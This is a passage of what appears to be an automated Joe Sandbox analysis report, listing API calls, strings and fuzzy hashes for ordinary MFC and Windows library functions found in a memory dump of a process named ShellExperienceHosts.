GdipDeleteGraphics.GDIPLUS(?,?,00000000,00000000,00000000,?,?,00000082,00000000,00022009,?,00000000,00000000,?,00000000,00000000), ref: 6CA383C6
GdipDisposeImage.GDIPLUS(?,?,?,00000000,00000000,00000000,?,?,00000082,00000000,00022009,?,00000000,00000000,?,00000000), ref: 6CA383D1

Strings

&, xrefs: 6CA38273
&, xrefs: 6CA380E9

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Gdip$Image$BitmapBits$DeleteDisposeDrawFormatGraphicsLockPalettePixelUnlock
String ID: &$ &
API String ID: 1665940520-360661826
Opcode ID: 4754a7adc1fc962d6caaf7a37eae9ecc18316608fcac196387b3d7b21d894bf4
Instruction ID: a0e408ff0f0e6384a7455fcd8089e8a5cebc51f4852ebbf5e04438aa6e851a32
Opcode Fuzzy Hash: 4754a7adc1fc962d6caaf7a37eae9ecc18316608fcac196387b3d7b21d894bf4
Instruction Fuzzy Hash: 44A180B19012289BCB148F54CD90AEDB7B5EF44218F5451EAEA1DE7701CB30AEC9CF98

Function 6C9BA425 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 209libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll), ref: 6C9BA447
GetProcAddress.KERNEL32(00000000,GetGestureInfo), ref: 6C9BA47C
GetProcAddress.KERNEL32(00000000,CloseGestureInfoHandle), ref: 6C9BA4A4
ScreenToClient.USER32(?,?), ref: 6C9BA530

Strings

user32.dll, xrefs: 6C9BA43D
GetGestureInfo, xrefs: 6C9BA46E
CloseGestureInfoHandle, xrefs: 6C9BA496

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: AddressProc$ClientHandleModuleScreen
String ID: CloseGestureInfoHandle$GetGestureInfo$user32.dll
API String ID: 471820996-2905070798
Opcode ID: dcfdf71cedb930ad07f92fc7930c3043d392288e1af2f3c9b27758c9ba3e21ea
Instruction ID: 06d06fd7286c8cfe959a3274a7a4fd12405d009bfa925f45ea01cd946d558d8f
Opcode Fuzzy Hash: dcfdf71cedb930ad07f92fc7930c3043d392288e1af2f3c9b27758c9ba3e21ea
Instruction Fuzzy Hash: 27816CB570161AFFCB05CF79D58496ABBB9FF0A314B10426AE809A3B54DB31E950CF80

Function 6C9EEE4B Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 184COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6C9EEE55
IsWindow.USER32(?), ref: 6C9EEF88

Part of subcall function 6C9BE402: GetDlgCtrlID.USER32(?), ref: 6C9BE40D

Strings

Name, xrefs: 6C9EEFAF
MFCToolBars, xrefs: 6C9EEE65
%TsMFCToolBar-%d%x, xrefs: 6C9EEEBF
Buttons, xrefs: 6C9EEFE0
%TsMFCToolBar-%d, xrefs: 6C9EEEA7

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CtrlH_prolog3_catchWindow
String ID: %TsMFCToolBar-%d$%TsMFCToolBar-%d%x$Buttons$MFCToolBars$Name
API String ID: 2286275402-190999575
Opcode ID: 935de37073eeb2ed35530eb765aa2dc5fa196e5d8c165463bc9419dc240b8238
Instruction ID: 1b97aa0d01a25bfa77a90b62ff5a75dcc1114e19b759afd32b55b80af8a5a4d0
Opcode Fuzzy Hash: 935de37073eeb2ed35530eb765aa2dc5fa196e5d8c165463bc9419dc240b8238
Instruction Fuzzy Hash: A971AD74E00259EFCF01CBA4D950AEEBBB5AF68318F104059E806B7790CB349E48DFA1

Function 6C9E4B61 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 165timeCOMMON

Download Yara Rule

APIs

SystemTimeToVariantTime.OLEAUT32(?,?), ref: 6C9E4B84
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 6C9E4BB0
__EH_prolog3.LIBCMT ref: 6C9E4C1C
VarBstrFromDate.OLEAUT32(?,?,?,?,?), ref: 6C9E4CB8
SysFreeString.OLEAUT32(?), ref: 6C9E4D0B
SysFreeString.OLEAUT32(?), ref: 6C9E4D48

Strings

Invalid DateTime, xrefs: 6C9E4C86, 6C9E4CF3

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Time$FreeStringSystemVariant$BstrDateFromH_prolog3
String ID: Invalid DateTime
API String ID: 4133050923-2190634649
Opcode ID: e518624f04b03e55e05c8b80ee3026b0e3a4e4b2f4c36c832e90e1daeafca42e
Instruction ID: ff92611ce5642adab9693f5d419c52cbcad9b2d7bcc72bc7e7719264e3aeb22b
Opcode Fuzzy Hash: e518624f04b03e55e05c8b80ee3026b0e3a4e4b2f4c36c832e90e1daeafca42e
Instruction Fuzzy Hash: 7A51C835900109EBCB01EFA8CC506EEB779FF25718F148218F915A7A80DB30E946CB65

Function 6C9DE6BB Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 6C9DE745
GetSystemMetrics.USER32(0000004D), ref: 6C9DE750
GetSystemMetrics.USER32(0000004E), ref: 6C9DE75B
GetSystemMetrics.USER32(0000004F), ref: 6C9DE769
IntersectRect.USER32(?,?,?), ref: 6C9DE7C2
IntersectRect.USER32(?,?,?), ref: 6C9DE81D

Strings

", xrefs: 6C9DE6F1

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: MetricsSystem$IntersectRect
String ID: "
API String ID: 1124862357-123907689
Opcode ID: bdddb8b910294760194e1fd4460c044aab9b964e98f0b3a99f7027d7633b7fe6
Instruction ID: 4b54e4b64555b95d531dc2744a467a24323c5d089c46405e30a9829c5660d893
Opcode Fuzzy Hash: bdddb8b910294760194e1fd4460c044aab9b964e98f0b3a99f7027d7633b7fe6
Instruction Fuzzy Hash: 3E619276A01209DFCF44CFA8D5C4A9DBBF5FF09314B15815AE909EB20AE734E984CB94

Function 6C9C6C27 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121windowCOMMON

Download Yara Rule

APIs

CheckMenuItem.USER32(?,?,00000400), ref: 6C9C6C56

Part of subcall function 6C9D1903: GetWindowTextW.USER32(00000800,?,00000100), ref: 6C9D1961
Part of subcall function 6C9D1903: lstrcmpW.KERNEL32(?,?), ref: 6C9D1973
Part of subcall function 6C9D1903: SetWindowTextW.USER32(00000800,?), ref: 6C9D197F

SendMessageW.USER32(?,00000087,00000000,00000000), ref: 6C9C6C71
SendMessageW.USER32(?,000000F1,?,00000000), ref: 6C9C6C8E
SetMenuItemBitmaps.USER32(?,?,00000400,00000000,00000000), ref: 6C9C6CFB
SetMenuItemInfoW.USER32(?,?,00000001,?), ref: 6C9C6D4B

Strings

0, xrefs: 6C9C6D3A
@, xrefs: 6C9C6D41

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ItemMenu$MessageSendTextWindow$BitmapsCheckInfolstrcmp
String ID: 0$@
API String ID: 72408025-1545510068
Opcode ID: dbfe68bdc687b0b616f3cc37f890e65ecd87ddd911c5c9decdb99b8f0d6dafde
Instruction ID: 230252991cdcc99afe9f7bd86451467d93df80a0690011f8457c26edf26e24fc
Opcode Fuzzy Hash: dbfe68bdc687b0b616f3cc37f890e65ecd87ddd911c5c9decdb99b8f0d6dafde
Instruction Fuzzy Hash: A841AC71300205AFDB248F65DC45FAABBB9FF05708F118629E619EB950CB71E851CBA3

Function 6C9D402B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(uxtheme.dll), ref: 6C9D403D
GetProcAddress.KERNEL32(00000000,DrawThemeTextEx), ref: 6C9D404D
EncodePointer.KERNEL32(00000000), ref: 6C9D4056
DecodePointer.KERNEL32(00000000), ref: 6C9D4064
DrawThemeText.UXTHEME(?,?,?,?,?,?,?,00000000,?), ref: 6C9D40B1

Strings

uxtheme.dll, xrefs: 6C9D4038
DrawThemeTextEx, xrefs: 6C9D4047

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressDecodeDrawEncodeHandleModuleProcTextTheme
String ID: DrawThemeTextEx$uxtheme.dll
API String ID: 1727381832-3035683158
Opcode ID: f4040740ff1f3efb95767e2ff1b420e39b139ffd26f1502a9117bd18dea8fe54
Instruction ID: b037de66e3187f721a690be43ba30c9837e4859b6c8e36b458419a6ea41decab
Opcode Fuzzy Hash: f4040740ff1f3efb95767e2ff1b420e39b139ffd26f1502a9117bd18dea8fe54
Instruction Fuzzy Hash: 0411A53660165AEBCF225FA4DC08D9E3F7ABF09754F054111FE19A2520C732D920AF90

Function 6C9C2E2F Relevance: 12.2, APIs: 8, Instructions: 246filecomCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9C2E36
OleDuplicateData.OLE32(?,?,00000000), ref: 6C9C2EC7
GlobalLock.KERNEL32(00000000), ref: 6C9C2EE9
CopyMetaFileW.GDI32(?,00000000), ref: 6C9C2EF7
GlobalUnlock.KERNEL32(00000000), ref: 6C9C2F05
GlobalFree.KERNEL32(00000000), ref: 6C9C2F0C
GlobalUnlock.KERNEL32(00000000), ref: 6C9C2F19

Part of subcall function 6C9C28BA: __EH_prolog3.LIBCMT ref: 6C9C28C1

CopyFileW.KERNEL32(?,?,00000000,?,?,00000054), ref: 6C9C30C5

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Global$CopyFileUnlock$DataDuplicateFreeH_prolog3H_prolog3_LockMeta
String ID:
API String ID: 4039237054-0
Opcode ID: 57afa241a8d3d3963bb2a896ad247692e12aa2e1373460562d00660a77a15790
Instruction ID: 1e9c11bc2ae87d3fc2d180563da499f8190881db69204fcbf12a591b6360c249
Opcode Fuzzy Hash: 57afa241a8d3d3963bb2a896ad247692e12aa2e1373460562d00660a77a15790
Instruction Fuzzy Hash: 6A818EB1700916EFDB148F78DD48D6ABBB9FF99704B048259F41A9BA54DB30EC10CB62

Function 6CA429DE Relevance: 12.2, APIs: 8, Instructions: 169windowCOMMON

Download Yara Rule

APIs

ReleaseCapture.USER32 ref: 6CA42A18
IsWindow.USER32(?), ref: 6CA42A39
DestroyWindow.USER32(?), ref: 6CA42A49
GetParent.USER32(?), ref: 6CA42A6F
IsRectEmpty.USER32(?), ref: 6CA42B41
IsWindowVisible.USER32(?), ref: 6CA42B8D
MapWindowPoints.USER32(?,?,?,00000001), ref: 6CA42BA3
SendMessageW.USER32(?,00000202,?,?), ref: 6CA42BC2

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$CaptureDestroyEmptyMessageParentPointsRectReleaseSendVisible
String ID:
API String ID: 3509494761-0
Opcode ID: 8bbb16492a0abb146b7a919eb205ce56c4b70f5e1266e1a0e352278f5c4bd597
Instruction ID: 1d84c32f5819c409ddd6bce3c130a979def15d0cd3826d8aaca41a6e1a2b00db
Opcode Fuzzy Hash: 8bbb16492a0abb146b7a919eb205ce56c4b70f5e1266e1a0e352278f5c4bd597
Instruction Fuzzy Hash: 12519D30700256DBEF119F20C898BAE3BB5BF45704F0941B9EC0AEF691CB70A945CBA0

Function 6C9BBCB2 Relevance: 12.1, APIs: 8, Instructions: 139windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 6C9BBCFC
BeginDeferWindowPos.USER32(00000008), ref: 6C9BBD12
GetTopWindow.USER32(?), ref: 6C9BBD23
GetDlgCtrlID.USER32(00000000), ref: 6C9BBD2C
SendMessageW.USER32(00000000,00000361,00000000,00000000), ref: 6C9BBD64
GetWindow.USER32(00000000,00000002), ref: 6C9BBD6D
CopyRect.USER32(?,?), ref: 6C9BBD88
EndDeferWindowPos.USER32(00000000), ref: 6C9BBE18

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
String ID:
API String ID: 1228040700-0
Opcode ID: 6ee4a6ea41f905ac0ff05b6786128affc2900930d32c737989db89c824948058
Instruction ID: e9bfae80b7f73df0279300b016e3695b859a3be824e2780a0f42ab4b93ed80ac
Opcode Fuzzy Hash: 6ee4a6ea41f905ac0ff05b6786128affc2900930d32c737989db89c824948058
Instruction Fuzzy Hash: 5051F372A01219EBDF11CFA8C884AEEB7B9BF49315F144159E905BB680C778E940CBA4

Function 6CA34C5B Relevance: 12.1, APIs: 8, Instructions: 118clipboardwindowCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6CA34C62

Part of subcall function 6C9C7012: __EH_prolog3.LIBCMT ref: 6C9C7019
Part of subcall function 6C9C7012: GetWindowDC.USER32(00000000,00000004,6C9E03E2,00000000), ref: 6C9C7045

CreateCompatibleDC.GDI32(00000000), ref: 6CA34CA2
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6CA34CC4

Part of subcall function 6C9C7FCD: SelectObject.GDI32(00000048,?), ref: 6C9C7FD6

FillRect.USER32(?,?,?), ref: 6CA34D0E
OpenClipboard.USER32(?), ref: 6CA34D3E
EmptyClipboard.USER32 ref: 6CA34D7C
SetClipboardData.USER32(00000002,00000000), ref: 6CA34DA0
CloseClipboard.USER32 ref: 6CA34DBA

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Clipboard$CompatibleCreate$BitmapCloseDataEmptyFillH_prolog3H_prolog3_catch_ObjectOpenRectSelectWindow
String ID:
API String ID: 2940850299-0
Opcode ID: 4831eca9c6a9938f5355065172b10caa9e653178a7931bc13366b75e692820ea
Instruction ID: ae6496094ef642b17753c940d9ae43c6589c4d9c40b9efec960dbe1dca5283ff
Opcode Fuzzy Hash: 4831eca9c6a9938f5355065172b10caa9e653178a7931bc13366b75e692820ea
Instruction Fuzzy Hash: 79418071E001689BCB01DBE4CD55AEDBFB8AF29708F104118E519B7B90DB319A09CFA2

Function 6C9D24C4 Relevance: 12.1, APIs: 8, Instructions: 97memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6C9D24CB
EnterCriticalSection.KERNEL32(?,00000010,6C9D23F4,?,00000000,?,6C9CC267,00000004,6C9CCA19,00000120,6C9A10EB,00000000,?,Function_00180400,000000FF), ref: 6C9D24DC
TlsGetValue.KERNEL32(?,?,00000000,?,6C9CC267,00000004,6C9CCA19,00000120,6C9A10EB,00000000,?,Function_00180400,000000FF), ref: 6C9D24F8
LocalAlloc.KERNEL32(00000000,00000000,00000010,?,?,00000000,?,6C9CC267,00000004,6C9CCA19,00000120,6C9A10EB,00000000,?,Function_00180400,000000FF), ref: 6C9D2561
LocalReAlloc.KERNEL32(?,00000000,00000002,00000010,?,?,00000000,?,6C9CC267,00000004,6C9CCA19,00000120,6C9A10EB,00000000,?,Function_00180400), ref: 6C9D256F
TlsSetValue.KERNEL32(?,00000000), ref: 6C9D25A0
LeaveCriticalSection.KERNEL32(?,?,00000000,?,6C9CC267,00000004,6C9CCA19,00000120,6C9A10EB,00000000,?,Function_00180400,000000FF), ref: 6C9D25BE

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: AllocCriticalLocalSectionValue$EnterH_prolog3_catchLeave
String ID:
API String ID: 1707010094-0
Opcode ID: 421dfb7b4a30e8872e238bb2f796f1d843e7c7bfb0ff69822e87ea3f3197e847
Instruction ID: 6936176ecdfa661050f79342523a28b8ef115c24e41cd6318aa504e11bc3e86e
Opcode Fuzzy Hash: 421dfb7b4a30e8872e238bb2f796f1d843e7c7bfb0ff69822e87ea3f3197e847
Instruction Fuzzy Hash: 7431A971600E019FDB218F24C498E5BBBB5FF45324B21C029E86AABA50CB30FD45CB91

Function 6C9F2758 Relevance: 12.1, APIs: 8, Instructions: 95COMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 6C9F2774
GetParent.USER32(?), ref: 6C9F2784
GetClientRect.USER32(?,?), ref: 6C9F27C8
MapWindowPoints.USER32(?,?,?,00000002), ref: 6C9F27DA
PtInRect.USER32(?,?,?), ref: 6C9F27EA
GetClientRect.USER32(?,?), ref: 6C9F2817
MapWindowPoints.USER32(?,?,?,00000002), ref: 6C9F2829
PtInRect.USER32(?,?,?), ref: 6C9F2839

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$Client$PointsWindow$ParentScreen
String ID:
API String ID: 1944725958-0
Opcode ID: 78b05968b6bd622d178cf9c6db5a4065bdc0ad223b7deb5207ac3e9c37e217f7
Instruction ID: 55b55a5dc24463aaa2ea7561d7cbbf2b4aa40349b90c6015dfabb8da04229dab
Opcode Fuzzy Hash: 78b05968b6bd622d178cf9c6db5a4065bdc0ad223b7deb5207ac3e9c37e217f7
Instruction Fuzzy Hash: 3931AF72B00649EBCF119FA0C8489AE7BB9FF597147204125F91AE7660DB30DD059B90

Function 6CA39F1E Relevance: 12.1, APIs: 8, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000002,00000000,00000000,00000000,?,?,6CA39F13,00000000,00000000,?,6CB42EC0,?,6CA3ACD1,?,?,?), ref: 6CA39F2F
GlobalLock.KERNEL32(00000000), ref: 6CA39F3C
GlobalUnlock.KERNEL32(00000000), ref: 6CA39F47
GlobalFree.KERNEL32(00000000), ref: 6CA39F4E
GlobalUnlock.KERNEL32(00000000), ref: 6CA39F6C
CreateStreamOnHGlobal.OLE32(00000000,00000001,00000000), ref: 6CA39F79
EnterCriticalSection.KERNEL32(6CB8F0A0,00000000), ref: 6CA39F92
LeaveCriticalSection.KERNEL32(6CB8F0A0,00000000), ref: 6CA39FF9

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Global$CriticalSectionUnlock$AllocCreateEnterFreeLeaveLockStream
String ID:
API String ID: 295443201-0
Opcode ID: edb7fa194d96f9795ac0d5ee1763681c997c64694471d63a94c1766179f8bbb3
Instruction ID: 1fec0722f2293efb81d08607b91a3c6cd4285d7e53b705b9c7e0a5943ba08934
Opcode Fuzzy Hash: edb7fa194d96f9795ac0d5ee1763681c997c64694471d63a94c1766179f8bbb3
Instruction Fuzzy Hash: 5A21B135702221AFEF109B74CD68A9E37BCAF1A249F144015E90EE7640DF34D944C761

Function 6C9DFA30 Relevance: 12.1, APIs: 8, Instructions: 65COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000031), ref: 6C9DFA3E
